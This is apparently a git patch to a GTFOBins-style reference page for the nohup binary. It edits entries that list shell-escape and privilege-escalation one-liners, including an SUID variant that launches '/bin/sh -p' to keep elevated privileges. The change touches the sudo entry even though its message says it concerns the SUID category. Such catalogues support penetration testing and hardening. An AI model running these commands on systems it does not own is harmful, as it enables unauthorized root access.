From db40142ea7429b630d31469369653eb66da12ccc Mon Sep 17 00:00:00 2001 From: Shikata Date: Mon, 11 Jan 2021 12:31:54 +0200 Subject: [PATCH] Remove redundant sudo from SUID category --- _gtfobins/nohup.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/_gtfobins/nohup.md b/_gtfobins/nohup.md index 6c75a80..2024e07 100644 --- a/_gtfobins/nohup.md +++ b/_gtfobins/nohup.md @@ -8,7 +8,7 @@ functions: nohup "$COMMAND" cat nohup.out sudo: - - code: sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)" + - code: nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)" suid: - code: sudo nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)" ---